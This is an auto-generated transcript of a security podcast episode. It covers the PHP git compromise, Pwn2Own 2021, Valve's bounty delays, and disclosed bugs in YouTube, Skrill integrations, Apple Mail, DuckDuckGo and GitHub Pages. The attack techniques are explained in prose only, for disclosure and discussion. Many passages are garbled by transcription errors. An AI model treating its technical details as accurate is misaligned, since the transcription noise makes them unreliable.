Episode 72 - Transcript

Pwn2own, Linux Kernel Exploits, and Malicious Mail

< Back to Episode Overview
This transcript is automatically generated, there will be mistakes
Specter
Hello everyone. Welcome to another episode of the day Zero podcast. I'm Specter with me is zi today. We've got some interesting topics for you all we have an update on the PHP compromise poem to own 2021 results and some various foam fun vulnerabilities. So let's jump into the PHP get instance take over update first. So if you remember from the last time we covered this two weeks ago. I believe the PHP developers announced their work emits pushed into their get instance that they did an author but came from there. Accounts the PHP developers stated that they believe the get server itself was compromised and not just a user account which they elaborate on a little bit here talking about how come it was first made under Rasmus name then another one under Nikita's name. So it seems kind of unlikely that both accounts would have been compromised independently. So yeah, there's a little bit more information on that now they ended up discovering that the attacker pushed the commits using HTTP and password-based authentication, which Which the developer like they weren't possible that was aware that was possible to do since they use SSH and key-based authentication, which is a lot stronger. So yeah, it seems somehow the attacker got the passwords to those get accounts in order to make those commits. They think it was possible from compromising the master dot php.net system, which is like their management system for tasks and authentication and all that stuff. They note that that's been running very old code on a very old. Oh Some PHP version and and it used HTTP digest off which is basically like playing md5. So they believe that's how it happened. They don't know for sure though. It seems there's a little bit of uncertainty as to exactly how the attack occurred but those seem a
zi
little bit odd like the main thing being that the attacker apparently needed to guess at the usernames. Which then indicates that you know, if they had a compromise of the credentials they would really need to do much guessing. They should just know what the usernames are. So that that kind of tosses a wrench to the idea. That was just The mastered are php.net compromised like compromising that user database. We like that. That's the thing that actually makes seem really weird to me. Is the fact they apparently had credentials but not usernames but then they were able to match the username to credentials. So it seems like there could have been some sort of some sort of exploit specifically in this type of identification perhaps or first they find the username and then they're able to bypass the authentication once they know what username but not actually providing the
Specter
password. That is a fair call out because that would kind of match up with what we were speculating on with it potentially being a bug that somebody wanted to offload and they couldn't just based on like the comments that were made in the militia or malicious and quotes commits because I don't think they did anything super serious, but it you know introduce like attacker controlled text and it mentioned zi rhodium. So, yeah, I mean that would kind of match up with that idea. And yeah, like that part of the story is a little bit strange to try to wrap your head around. So
zi
yeah, it just doesn't make sense to me. I mean, I guess that's kind of the story they're going with is perhaps that like, they're not holding hard on the fact that that was what was compromised just that's they're running Theory which is
Specter
fair. They just don't have all the information that they want. Yeah, but just you know gonna happen.
zi
Yeah, well, especially if they're running an old system. I'm doubting. They were running a lot collect information to actively be able to determine whether or not somebody or to do the proper incident response. I guess I'd
Specter
say yeah, so what they've done is they've migrated the Master php.net System to PHP 8. They now use bcrypt for passwords and reset passwords obviously and they move towards using parameterised queries to be more resilient against SQL injection attacks. I
zi
mean, I'd be surprised I'm surprised that they wouldn't have been doing that. That is like that's I mean I am disappointed that they are killing the subversion. Shen support that subversion has you know A place in my heart. So the fact that it looks like it wasn't. Yeah. Well looks like it wasn't to you so whatever but yeah, they're making they're taking some steps to resolve it that said something seems really should have been done beforehand. Like especially just running the old server. I mean it doesn't take much to do your updates. Yeah, that's said we don't know how outdated it was. Yeah, so this was a nice
Specter
like transparency report. But like we've kind of been hinting at here. This doesn't really reflect too. Well on PHP array to admitting using older code older versions on the management system and being a forsakes was probably easy to compromise it
zi
reflects. Well in the sense they're being open about it. They're not trying to necessarily We downplay their just sharing kind of what their guesses are at it. Yeah, and I can appreciate that. I always I'd rather see a company being open about it rather than trying to hide it. So I do appreciate the update regardless and sounds like they're at least taking some of the right
Specter
steps. Exactly basically to some of the story. It's like yeah, some of the stuff said in here is a little bit concerning but this level of openness and this steps that they've stated they're going to be taking are generally in the right direction. So, you know bit of bit of concern but also a bit of hope I guess coming out of that post but yet still don't entirely know what the reasoning was behind the compromise and We probably won't ever honestly unless the attackers I read come and say it or something. So yeah, well move on podo own happened last week and there was a lot of cool stuff that came out of it this time around thankfully those who have been watching for a while may remember I wasn't too thrilled about the last one just because of the target selection for those who don't remember what last phone to own was. I believe it was prone to own Tokyo in Toronto. It was the mobile what's supposed to be the mobile phone. Down but there was a lot of iot Targets in there and basically nobody went for the mobile devices. It was all routers and TVs and stuff, which was just not it was a bit depressing honestly, but this this phone has a lot of cool Targets in it and hopefully some cool exploits that will see out of it. So I will quickly say one thing. There were a lot of people that were looking at home to own and talk about it and asking when will see the issues come out of it. So condone is basically a And where researchers submit stuff and the vendors get it patched. We typically don't see vulnerabilities at opposed to own for months. Usually they come out in the form of blog posts like several months down the line from zi a lot of which we cover on the podcast, but it's not something you're going to see like a week after the contest or something. It's it's quite a bit of time lag between when you see what was done in the competition from the outside, but Yeah, like some of the targets that were hit were really cool. Again this poem to own was virtual. It spanned across four days instead of the the two that are more common or three kind of taking advantage of that virtual aspect. Some of the targets owned included Safari Chrome and Edge one of them worked on both Chrome and Edge, which was really cool and funnily enough. I believe somebody dropped a POC for that bug today from what I saw on Twitter. I'm not entirely certain if it's the same bug that was submitted the pwned. but judging by the discussion, it seemed like it probably was so, you know I said that usually it's a cup like it's several months for we see suffered upon dome but there might have been a case of collision where you might be able to see one of those bugs already and will probably cover that next week because obviously I saw it like 15 minutes for we came on for the podcast so I could not have time to look through it really, but yeah, I mean there was also some MS Exchange Server stuff from Dev core virtualization stuff on parallels and virtualbox and a few Ubuntu LP. He's unfortunately there were quite a few partial wins five overall, which there was a bit of discussion around as there often is around whether or not it's fair to only accept partials. And the reason that a lot of those bugs were partials because the bug was quote already known to the vendor or zi zi and and there's a bit of discussion around that because from the researchers point of view there. No way. They could have known that the vendors already knew about it if they haven't patched it yet. And then like that sucks, right they put all this time into writing an exploit all for the vendor to say. Yeah, we knew about this issue. So no money for
zi
you. So In fairness I will also say or at least to get ahead of what the usual clients as you know, the vendor could be lying 1 zi D eyes been doing this for quite a while and to the vendor does have to show you in their internal bug tracker that they have the report for this bug and I have a set amount of time to actually go and find the bug report for it. So it's unlikely that the vendor is going to be lying about it. It's it's a lot better than what you might see over at hacker one where? Bless evidence needs to be provided. That said I mean this is also kind of the same deal as you know, would normal bug Bounty. Somebody has a duplicate report. They don't get paid on it at all or well it depends on the actual Bounty program most mounting problems. Don't pay out on duplicates. This is basically no different than
Specter
your standard Bounty program. And I
zi
agree that like it's a bit of a problem because obviously researchers are putting all this time into it and then sucks like you lose all And because of it being a duplicate and because they're holding off on the report until they actually use it at phone tone. Which means like if it's reported, you know the day before point. Oh that sucks a little bit more yet
Specter
to that's that really sucks. That's very unlucky if that happens that said I can kind of tie that to appoint somebody brought up from chat exponent talking about the worst rules. The one that allows vendors to patch the application right before the a competition. Yeah, that is really shady. And I don't really agree with it. But there are definitely have been cases of vendors patching their their products at the day before and honestly, like when you do something like that that does seem like you're intentionally just trying to screw over the competitors. Well their way through trying to get them paid out.
zi
So I'll so making sure that any of the bugs they know about are not going to work. Yeah, I think that's fair on the vendor side to I mean it sucks for the researcher side. And I think we really just need a solution to the whole like duplicate or already know one vulnerability issue. I think that's where things need to come down to. I don't think we should be faulting. The actual vendors for trying to patch their systems before it or trying to make sure it's as secure as possible prior to it if they are doing that like I don't think that should be a huge issue that that I don't think is a bad thing. I just think we need a solution on dealing with the duplicates and stuff. So part of
Specter
what vendors do that is I don't really know why but I know some vendors use Ponda own as an actual like indicator of how well their security stance is doing like did we get popped up own to own this year? Like that's kind of how they think about it. So if they can patch an issue before it gets exported the poem to own then that that kind of, you know, makes them feel a bit better about it. I guess I do. Kind of take issue with like patching the day before I do agree that to an extent that kind of comes with the turf right with this kind of contest you're gonna you're gonna have to land on one side of the other being the vendors of the researchers and whatever side you choose is going to make the other one mad and collision and whatnot is nature of of doing exploits. But patching the day before has always kind of rubbed me the wrong way honestly, but yeah, I mean that said I've seen that Reason being cited for like potentially changing the way pend own works, you know, which I don't know if I fully support like one of the ways I that I've seen being suggested for dealing with the issue is not requiring full chain exploits, right so that way even if you have Collision or if the vendor is already seen the bug you're not wasting as much effort developing a full chain exploit, right? It's just the bug is burned. Oh, well, I don't know if I really support that because I do. And of like the way poem to own worse with the exploit aspect, I don't think I'd want that taken away necessarily because unfortunately there is it is kind of limited the amount of avenues you have on the exploit Dev angle compared to the Bone research angle. But yeah, I have seen that argument kind of brought up that maybe zi should change some rules or change the way that it operates a bit because there were some unhappy people for sure. I mean,
zi
you know what the thing is you can report any bugs. CDI it without a proof of concept without taking part in Poland own. I think having the full excellent is part of what makes phone tone interesting. It's part of what actually makes it a challenge. It's not just oh I've got this crash. That's probably exploit. Well, it's actually exploit and get in a dynamic environment. And having even the updates happening just before it means You're vulnerable are your exploit needs to be able to withstand having an update having some changes or you need to be able to change it on the Fly within a few minutes. I mean that that feels like part of the contest to me not something that should be removed.
Specter
Maybe it is why sorry, go ahead. Oh,
zi
yeah. I was just going to reiterate if if you want to just submit a proof of concept you can do that directly to zi zi. I believe they'll offer a bit last week you can do
Specter
it. So that's what I was going to get into that is what you were saying with the exploit ability aspect that is partially why on do and also pays so much more now, I think a little bit less is an understatement from what I've heard the CDI people to avoid a bit. Yes. Yeah because like some of the browser bugs and stuff that were found in this competition. We're being paid like $50,000. Whereas if you submitted them to CDI, it's probably closer in the neighborhood of like under 10k. I would assume from The Limited information. I know it is a little bit hard to say because payout amounts of stuff are not disclosed for opponents or zi submission. Sorry, but yeah, like zi zi you are getting quite a bit less. But like zi said you you have a lot less of a work burden put on you as well. So, you know, there's trade-offs there. Yeah, in terms of results first place this year funnily enough was a three-way tie between Dev core OV and and copy test all at 20 points Dev core actually meant that 20 points with just one submission The Exchange an exchange server attack with Jack dates following at 14 points and then team Vettel I think is how you say it at eleven point five points. So yeah, it was more fierce in the competition this year than we saw from like the last event and overall just some of the targets hit were really cool. I will say the live stream they Live stream where they were doing like discussion between attempts and live-streaming the attempts. It was a bit disappointing for me personally trying to see one of the attempts and like I was looking at the Ubuntu LPE basically and when I tuned into the stream and they switched over to the competitor they were already on of root shell like they are deeper and exploit so it felt kind of weird to me like why stream that if you're just kind of Dream into a root shell. I do kind of get that they don't want information leaking about the exploit before it's fixed. But like you can control what you print on the screen when you run an exploit so and like what did start putting the onus on the
zi
exploit devs that we can make sure that their output is clean. I mean, especially because they may need to debug the exploit on the fly. Right as they're doing it. They're going to want that information getting printed which Going to expose a lot of information. We're probably exposed information about how the expert actually
Specter
works. Yeah, it's honestly just like a personal thing where I was like really disappointed. I was hoping to see the just something, you know, like run the command see if it ASCII art and that a root shell or it's just going into a rout shows just a bit. I don't know disappointing to me, but that's just a personal thing. I totally get why they do it that way. But yeah, like I was saying before that I mean this was just a all around a really good event. I think judging by like the targets that were hit and the results.
zi
So yeah, definitely more interesting the last one we
Specter
covered. Yeah, then fluoroacetate retire. I do not know they did not participate in this competition as far as I could see. I don't know why exactly that is I believe a lot of floor acetates targets last time around were in the iot stuff. So it's possible. We'll see them again in the iot if zi has an iot oriented event this year, which I think they probably will but we'll see. But yeah, we'll move on to some drama as you know, we'd like to do sometimes there's been some drama around valve and their hacker one program secret Club put out a tweet that they found multiple vulnerabilities and Source engine, which is the basis for valve games, including csgo and TF2 and a variety of other games. One of the issues they talk about well, they didn't really talk about the issue itself on Twitter, but they just kind of mentioned that they found one and A brief video of the pop running but one of the bugs they found was reported two years ago and wasn't rce that function just through the steam invite functionality and there were also two other rces which could be launched from Community servers and understand these are see he's do have some significant impact, right? They can be used to run like spyware on a Target PC steal banking information or credit card info as well as skins for those who are familiar familiar with the csgo. Those do have quite a bit of monetary value and these issues have been untouched for months or years by Valve. Like I said one was two years that that's been going on fixed and the other two were for an unspecified number of months and for five months. So this deserto post does a good summary on it. I do think it's a little bit overdramatic saying that you might have to stay away from the game. I don't think that's true necessarily, but I mostly just wanted to use this as a catalyst to ask Why does valve even have a bounty program? I really don't understand
zi
because covered them paying out bounties before so it's not like they don't pay out any bounties. Yeah,
Specter
so but this story is not the first time I've heard of where valve has just left reports Sitting In Limbo for months on end. Like absolutely valve has closed reports in the past and paid out. I'm not saying they're like not paying researchers,
zi
but but they're not paying researchers in a timely manner.
Specter
Well, not only that they're not even triaging reports in a timely manner. So it's not only kind of screwing over the researchers who might want to talk about the research and get a payout. It's also screwing over the customers who could potentially get hit by these attacks because they're just leaving them for months. And and yeah, like it just it it feels really like I said the size with the researcher especially because it's not only about getting paid. Sometimes you want to share your research and you want to share your findings and do a blog post or right up and you just can't do that while it's stuck in limbo in the Bounty program. And yeah, like, I don't know what it is with valve when it comes to fixing bugs whether they be these are CES that were talking about or some other bugs. Like there were some bugs that affected competitive Integrity recently like smoke bugs and the infamous coaching bugs. I've got a bunch of coaches banned by E. Sick a few months ago. It just seems like valve doesn't really care that much. They only fix them when they have no other choice or when they're just bored or something. I don't know like there's there doesn't really seem to be any Strong incentive to fix these issues on the valve side like saying they're not proactive would be an understatement. They're not even really reactive to these reports. So yeah, I mean, I don't really know what's going on the valve. But I mean if they're going to continue doing this where they're just gonna leave reports in limbo just pull the Bounty program. I feel like it's a waste of everyone's time and effort at this point. Like I feel really bad for researchers who put months. Of their time into finding a vulnerability exploiting it and then it just sits there forever on a shelf. Like it's just why I like just don't run a bounty program. If you're going to do that and their Bounty probably comes through hacker
zi
one and this is one of those I've talked a little bit before but I feel like hacker one is in a position to actually move companies to have an increasingly more mature security program and I've talked about before when it comes to disclosures like At first law and companies, you know, it's not Lowe's and then leading them along or even requiring them to start disclosing vulnerabilities and this is kind of something to wear just the time to triage especially if it's taking that long. It's getting passed from the
Specter
hacker one triage hours
zi
to the to the valve triage hours to then kind of like verify and that's probably where the issue is happening. I can't imagine hacker one is actually taking two years. Pass it over to valve. No way like it can't imagine that being the case. So this is also one of those cases where I think Val are sorry hacker one could consider introducing like a requirement on how long it takes the triage certain thing. I mean obviously there can be exceptions but setting kind of certain expectations of their clients. Also, I feel like hacker one is in a great position to be able to push something like that forward. They're not going to do it. Like that's not good for business to push a business beyond what they want to do. So, I guess they won't do that. But I like they're in such a good position to improve the security of a lot of things of a lot of companies that I kind of wish they would started using that.
Specter
Yeah, I agree. I think that would be a good move on their part. And yeah, I mean that's kind of the only reason that valve does what they do right as they can they can get away with it. They can get away with running a bridge program without any like level of expectations on the on the vendor side. So yeah, that's a good suggestion. I like it.
zi
You know, I'll say one other thing kind of In fairness here is we don't have details about how this exploit works or why they might Not have paid it out or decided not to her why they may not have triage it like so not triaging it actually like I can't think of a plausible reason for that not to have occurred. Like triaging is should have happened. Like if they just damp a doubt that's a little bit different but at the same time without details like we don't know what the complexity could be and we can't even really speculate on that.
Specter
Yeah, I mean if they received report and then they decided okay the circumstances of this like yeah, it's an issue, but it can't really be used and we're not going to bother paying for it like and then they close it that would be different right because then okay, it's closed. You don't get a payout which might suck. Then if valve doesn't really consider it much of an issue, then you can talk about it and you can release your research if you want to or as if they just leave it sitting on triage, you just just it's like you never even really discovered it because you can't
zi
wake up in that limbo. Yeah. Yeah,
Specter
and that's another Point. Yeah from chat hex phone says, they're big payouts are a siren Call and yeah, like that's what attracts a lot of people to the valve hacker one is for one. It's binary which you don't always get to see on hacker one. Any a lot of them are web and the payouts are big like you're talking about like a 10K payout for an RC e and Source engine from their payout table. So yeah, it's a nice payout and it's it's like a cool Target to look at but it's just ruined by how badly the Bounty program is ran by the how so, yeah. It's just a really unfortunate situation all around I think. But yeah, we can move on to our exploits section of the show. So YouTube exploits are back from David Hugh. We've covered being able to get snapshots of private videos from users and being able to get into a user's private special playlist, like their uploads and likes and whatnot, which were the past two issues. Both of them required some special circumstances to exploit though namely needing the video or playlist IDs. This one though is a much more practical. Attack and and this is a new set of issues because it basically just involves getting a victim to visit a malicious link effectively due to a sea serpent shoe. So with YouTube you can use it on Smart TVs and whatnot and YouTube has an API in order to provide remote control to play it on a TV or do whatever else and that's called the lounge API the way they detect that your TV is pretty simple. It's just like a simple user agent string check. Since the YouTube TV apps use Cobalt which is like a lightweight browser for those types of applications. The main problem is that the lounge endpoint doesn't have any see surf protection. So an attacker can send a request to that endpoint on a user's behalf from a malicious website to get a lounge token, which can then be paired with an attackers device and that can lead to compromise both unlisted and private videos that a user has in playlist unlisted videos the attacker get the IDS and they can just deal. Those to view the videos since the ideas effectively like the password for the video and private videos can be played as well. According to the blog
zi
post. I'm not entirely sure how that works is that
Specter
should be bound to the account still.
zi
So the way the way that worked is with the lounge API when you actually have a graph on here, I think kind of showing yeah, so the user would send a request like, you know play this video to the lounge API. They did include that Lounge token that Mentioned today they did include that with that and then the TV itself is doing long pulling against ad Lounge API and it's looking for are there any new commands for me and it's like yeah, okay play this video. And so the user when they asked the Play that video I'm not sure if the user was also including yet or if the lounge API created the token but there was a CT token. So when the TV goes to play a video it'll go and get the video information. Patience like an endpoint / get video information and they'll include the video ID and this token that have received from the lounge API that is specific to the video. So that is the kind of authentication or authorization token that needs to be passed through without that so without the legitimate user who is allowed to access the video providing that CT token and then passing it over to the TV you wouldn't just make to play the video. So that's where the Sikhs have comes in. You have your able to make requests that are authenticated as this user to the lounge API. And it will be authenticated using their cookies like said see surf so when they say Play that video it'll work and then to get more videos we've talked before about not really an issue but the predictability of some for your playlist those kind of built-in playlist like your liked videos and specifically your upload playlist and sifting play a video you could also do like play a playlist. So you combining that you can kind of predict what the playlist ID is going to be for the uploads and that's how you can kind of leak all of the private videos without actually knowing any of the private video IDs by predicting what their playlist will be.
Specter
Yeah, and that was on the last issue we covered. I wish I had the episode number on hand. I actually I should have went and got that but I forgot to but we did talk about the ID structuring and how that all works on David. He was a previous blog post on that. If you want to see more around that that particular issue but yeah, this this blog post goes pretty long into the story of how this was discovered and the thought process behind it talked about how he thought about it after playing a private video. With a friend's place on their TV app without the TV being signed into their account and talked about how they built like their own TV application that makes the necessary API requests to pull off the attack spoofing a TV basically. So yeah, like awesome attack.
zi
My sister ended up getting I do want to pull one question over chat from free SRX. What can a malicious party do with knowing users private videos and playlists the main thing there is you can imagine like sir. Certain brands will use in they'll have some private videos or perhaps, you know, somebody that just upload some private videos for themselves and turn them that like, so this is going to be a target attack. See do need a predict that playlist. So you can't just like generically run it against anybody. But basically, you know, you're just getting a leak of all of their private videos. Well all of their videos, but that includes the private videos and unlisted. So my thing would be you know business intelligence I could imagine being used and that sort of cakes for your able to get somebody who manages a brand. Yeah. Xhr. Thhle also mentions a bug Bounty a proof of concept videos would be another example, there are definitely some sensitive videos. I Uploading you'd have to be targeting them specifically of but there definitely are things you can kind of pull out if that are pull out with this. For sure.
Specter
Yeah, so researcher ended up getting a six thousand dollar Bounty for it and it's cool because it has a similar impact to some of the previous attacks in terms of what can be accomplished. And actually it's even more impactful because the previous attack on private videos. They just manage to get snapshots not the actual video play whack playback. You didn't get like the, you
zi
know, get audio or
Specter
extreme and you didn't get the audio Yeah that
zi
said I do love that. Using the thumbnails to rip the video. I do like that attack, but the thought that was cool. Cool. Cool way to go about it grabbing the thumbnails. I don't remember what episode we talked about it on but basically grabbed the thumbnails using it was one of like the advertiser apis or something where you can add a video and tell the thumbnail or something. It was a separate application that just interacted with YouTube. So didn't have the same privilege checking. Yeah, we I thought it was really cool Tack. And this one is well, I guess it's not really the same vein. But yeah, I actually I've liked all of this fence posts. They've all been some interesting YouTube
Specter
bugs. Yeah, cool bugs and well written posts. And yeah, this one's like the most practical one that we've covered so far, I think so. It's a good a good addition up next. We have an interesting issue in a sensitive website. Let's say it support site which makes the issue all the more problematic because the issue is basically an endpoint that apparently allowed you to steal all account information such as email and password and the the passwords were only protected with md5. We don't really have many of the specifics. It is a limited this closure. But if there was one type of website, you wouldn't want your email especially and your password we from I think they would be this kind of site. The issue itself is a little bit old. It's from March of 2019, but it was just as closed April 6th. They ended up getting a $5,000 Bounty for it. I will say I am not totally sure. How you accidentally exposed an endpoint that discloses account passwords must have been a debugging based endpoint or something. That is really strange. Well,
zi
another option is If you set yourself up and end point that is just like user information and it just dumps all the if like imagine a profile and point makes like a Jason there gets a Json response or something. And in that response it basically just dumps whatever it has in the like users rule Row in the database or something that could then include the md5 password along with email and everything else. And then the you I will decide what to display. I'm not saying you should Implement a profile that way but I have absolutely seen things like that being
Specter
done. Yeah, the other thing that you mentioned was md5 md5 and
zi
twenty-five and twenty twenty one is Without reason we did actually just talk about the PHP thing where that was using Apache digest. Well, I guess just technically http-based digest whatever. We're that also kind of had md5 little bit. They're basically for if they're doing basic. Little bit more complicated athletes and just the hash of the password. Where's and this case seems like they literally just hashtag with md5. They do there's no mention of a salt here either which is even worse.
Specter
Yeah, I mean if they really wanted to protect passwords, they should have just hatched it with crc32. I mean that was that was a joke justjust to be clear
zi
crc32 wins, you know, very
Specter
strong very very strong
zi
but on a more serious note. So if you are doing passwords, I often hear people this kind of a side topic but Even some security people are at least beginners. They're saying like, oh just you know Ash and salt and these days no you need to do more than just hashing insulting. I won't go into the details here, but basically defer to somebody else or defer to a library that specializes in dealing with the passwords like you shouldn't be calling the hash functions yourself. Ideally,
Specter
if you're using something like PHP, it has passed on to pretty salt password hash. It has a solid API for doing that as well. So yeah, just use better like use better channels. It seems like this site wasn't wasn't designed in a very smart way. Although I don't know. I don't know how old it is.
zi
I was just surprised to see md5 and in this
Specter
year. Yeah, you're in like that. What year is it meme? So we also have a post about instant payment notifications or IP ends and issues between the vendor checkout page and the payment processor being a uk-based one called Skrill and its use on to gambling websites.
zi
So they go into a
Specter
bit of background about how the the authentication flow or the how the flow Works between the vendor checkout and the payment processor and and what happens in between those stages talking about how squirrel will generate an MD. I have signature as an authenticator for a transaction and then that md5 signature is generated using several bits of information including the merchant ID transaction ID and the all the information pain like that's attached to the transaction as well as an md5 hash of the developer Secret, by the way, I don't know what it is with mb5 today seems to be one of those one of those show themes one issue is around the developer secret being that the plain text that gets hashed can only consist of of lowercase alphanumeric characters with no special characters allowed and it's limited to 10 characters long. It's like the opposite of what you want for thats for it. Yeah, my
zi
secret work 10 characters sounds good. I mean appending too many characters.
Specter
So like the 10
zi
characters is some I mean, it's not good. But it's not as bad as the fact they all have to be lowercase and no special characters including uppercase including special characters 10 characters like it's not great, but it's not terrible. But anyway because of that you can probably guess where this is going that you're able to if you're able to leak some of this other information such as the merchant ID the transaction ID that it comes up with if you're able to leak that information, which they talked about doing by modifying the status URL. So basically the URL that's uses as a callback which isn't always going to be the case. It depends on how they're actually set up but in this in the case of a couple of these casinos they were Able to control that status URL which then allow them to kind of leak some of this information so they can then go ahead and try and brute force and figure out what the md5 signature actually was and then as you can kind of guess they could spoof that reply and make it seem like some say they're not checking if the IP is correct or it's coming from the proper domain just we got this endpoint. It has the right md5 signature. Hey, they must have sent us $25,000 totally legit. We basically just leads into smooth language. Definitely a fun attack. His Bounty unfortunately was not for 25000 that he pretended to. Send in but instead $10,000 for which itself are definitely a very damaging
Specter
issue. Yeah, basically the main problem there though is the entropy right? Your entropy is far too low with those restrictions on the password. He ended up reporting issue to the gambling companies and advise them to generate the transaction internally and validate the transaction details from the scroll servers before processing them. He also States they should use better passwords in quotes though. I will be honest this point kind of confused me. I don't really understand what he means there. The password issue from what I understand is an issue on scrillz side. Not the gambling websites. It's Skrill that imposes those restrictions. We don't know what
zi
password he actually came up came across perhaps they did have a fairly weak password even with that 10 limit like maybe it's like their name or something, but we don't know that that said yeah, I do think that is more scrilla. She that they should allow more than just 10 lowercase characters. Yeah,
Specter
that's that's one of those things where it's just makes sense to strengthen your security on all the angles you can and and basically force your clients to use secure secrets. So yeah cool Tak though, and I kind of played on multiple issues right that that issue of low entropy and also not internally handling the the Callback stuff. Alright, so our next one is a 0 click in the Apple mail application on Mac OS it's related to compression and more specifically automated decompression of attachments that are sent from other mail users. So when you send email on this mail application attachments can get compressed right and then it can put in the mime headers to let other Mac OS mail clients know that hey these attachments are compressed. Just so when you receive email just decompress them so that they're readily accessible for the other user and it uses it for compression. The problem is relatively straightforward bits of uncompressed data are not cleaned from the temporary working directory, which is also not unique between systems. So an attacker can basically establish symbolic links in the temporary link to other files with a malicious compress attachment and then send another attachment which will utilize that symbolic link to do something damaging like At an arbitrary file, right? For example. Now you are restricted to the mail temporary directory, but there's still some interesting things in there such as the the meal rules list is one that they hammer on in this blog post. The author points out. You could add an auto forward rule to leaked email data or it could be used to leverage another bug potentially to chain with for a better compromise though. That is theoretical. They just kind of touch on that as like a quick throw away point. They don't have an example of anti Attack surface, you could potentially take advantage of but that possibility is there. So yeah, not a super complex issue. It's mainly just the fact that that the files that are decompressed are not cleaned up between runs or between instances. I guess timeline was fairly reasonable. The issue was reported May 16th, 2020. Apple shipped a hotfix on Catalina beta for I believe on June 4th, and then to support its stable versions, July 15th, So within within a month or two
zi
But yeah gave me I will say this is a bit weird. I would
Specter
expect the temporary files to get cleaned up, but I don't know if it's like a logic bug where maybe some of them got cleaned up but certain types of files didn't but well, yeah, there was so much elaboration on that kind of be a
zi
situation where it cleans up. But only once it's done processing the entire message or all the attachments or something like that rather than doing it with every single attachment because this sort of in theory like under normal circumstances, you wouldn't be over any files because he wouldn't have two attachments of the same name. It's just because it does the auto extraction that he kind of run into this. Yeah. So that mean it's one of those classic issues just with zips and also having the siblings inside of his death or inside of the compressed container.
Specter
Yeah, honestly, they should just probably be validating the Sip attachments and and just not extracting symbolic links and stuff. But yeah, I mean it's always fun to see apple stuff. But yeah, not too much to say on that one. It was a pretty straightforward issue. We have a quick stored xss in the Privacy based search engine DuckDuckGo in its search result page. The xss is in the green URL text underneath the headline of the search result that URL was not sanitized against cross-site scripting which could be taken advantage of in a number of ways using a few websites ways. They point out is using search queries on things like Urban Dictionary and bitdefender profile URLs. So yeah, you can just generate a query for that with an xss. Payload in it and send a link to the search results page for that and excess us somebody that said this would be a pretty obvious attack to anyone who scrutinizes links before they click them. They you be able to see the excess payload directly in the URL unless it was chained with another issue like one of those issues. You see sometimes with chat clients where you can substitute the link that you're directed to from what's actually being displayed to the user which is an issue in and of itself. But
zi
yeah, so you Well, they use the example here of like having the actual excess payload is part of the search in this case in theory. You wouldn't have to do that. It would be more difficult to go about it, but you could come up with some page that has a URL but has a normal looking thing because the search doesn't need to be Popular search it doesn't need to be some that they're even going naturally look up themselves. It could just be like, you know a face smash on the keyboard and you register that domain so it's going to come up with a search for and you get that URL in there at that point. Then it's not going to be in the URL when they click it and it will execute when they low So you can hide it as long as your search query pulls it up. That's kind of the main thing. Just their example here as it being right in the URL, but in theory as long as it's in the URL, it does need to be in the search string.
Specter
Yeah and Word of Mouth from chat mentions a link shortener. That's another valid point to bring up to try to obfuscate that you're
zi
accessing. I'm more likely to scrutinize any short lengths and I run across that I am just random links
Specter
see where that kind of falls apart for me is on Twitter because unfortunately Twitter users short links for everything, so it's There are some places where I could see it being pulled off and I think yeah, you mentioned TDOT co-write and chat. So yeah, I mean there are a few Avenues I can see a link shortener being taken advantage of but yeah, I mean you'd have to get creative basically to be able to pull off this attack and a practical context. So I find it very interesting that there was even this issue at all though an inductive goes page. That seems like a fairly obvious thing to check for xss. Is that kind of data, but I don't know
zi
maybe not it's like oh maybe that's kind of has some Legacy code to it. I don't really know much or anything about duck duck. Those those code base. It feels like one of those things I'd like am most Lab at well, not most but in a lot of web applications these days that are actively maintained. They're also using a framework that should be dealing with most of most of the simple excess cases, you know, assigning the text to be displayed somewhere not just providing the not just using it as HTML. Yeah, so that just feels a little bit odd to
Specter
me. Yeah, I guess it was just something that slipped through the cracks somehow. I don't know but yeah, it was interesting to see that it was there and on the loss.
zi
Yeah, like I can kind of understand why somebody might Why somebody might look at this and think okay. The URL is somewhat safe not really thinking about actually including incor including these characters, especially if you're maybe expecting it to be where L encoded or something like they might might be thing along that like I could understand the thought
Specter
process there. Yeah, alright. So another episode Another GitHub issue. This one is affecting private pages and is potentially the highest-paid bug Bounty by GitHub so far. I did try to take a quick look at that. It was hard to confirm because they they have a lot of reports by the way, but yeah consists of a few different issues that are related to one vector. So the post starts out by detailing the authentication flow of how private pages are access on GitHub. Our user is checked if they're authenticated. If not, it'll generate a nonsense side of your session and direct you to the login endpoint with the page ID were after successful login it'll generate an auth token and associated with that nonsense. They also state that the session cookie where the nonce is stored uses the underscore underscore host prefix, which most browsers except for IE will respect and prevent JavaScript from setting it against non-host domain the page ID in the session cookie is Where the first bug comes into play they found an issue where you could inject the page ID parameter into the cookie, which was interesting but quite restrictive because the ID is converted to an integer so they couldn't easily use any non integer characters including spaces what you could potentially do though is inject a null byte to break out of the integer parsing to do something interesting there. Well some
zi
you could inject the spaces. Sorry. I might have just misheard you it sounds like you might have said they couldn't Jack space of a that was the thing that actually triggered them to the fact that there was a bug going on here. There was some sort of Disconnect going on is we end up happening is they have the page ID if you're able to see the screen and not just listening to us, you'll notice there's a space before that semicolon. They were able to get that space there because it would parse it to an integer, but when reflecting it in the cookie, it would use the original value. So they have this pseudocode here where it would do the two integer on. The page ID within setting the cookie it would use the original value. yeah, so there's kind of that disconnect between the parser and the the then what you were just about getting to is the fact that yeah, and then the way they got around not being able to include any sort of text characters because the two went would fail then was by using a no by to kind of stop the processing and then after the no by thing can include whatever characters they want, but white space was kind of a loud and the thing that kind of had them notice that there was a possible bug
Specter
there. Yeah, sorry. I think I confuse myself there. For some reason. I thought they were saying the white space wasn't allowed. But yeah when you explained it and when I was reading it while you're talking about it. Yeah that makes more sense. I don't know how I messed that up. But thank you for correcting me on that. So yeah by injecting a no bite into the content body. They were able to use that in order to get excess on the page. They did have to put it in the content body if they put it in the header the header we get rejected. Yeah,
zi
just just kind of for clarification say getting into the content body. So the traditional way to get excess when you have a header injection like this. Well, technically it's not a header injection. I Specter just said put in have a no bite in the header, but you could have the white space. So carriage return new Line character returned to you line. Basically having a blank line is how HTML separates the headers from the actual body. So you inject the two new lines, you know bite and then you control the body. I mean, I assume a lot of you probably already knew that but I figured I'd explain it at
Specter
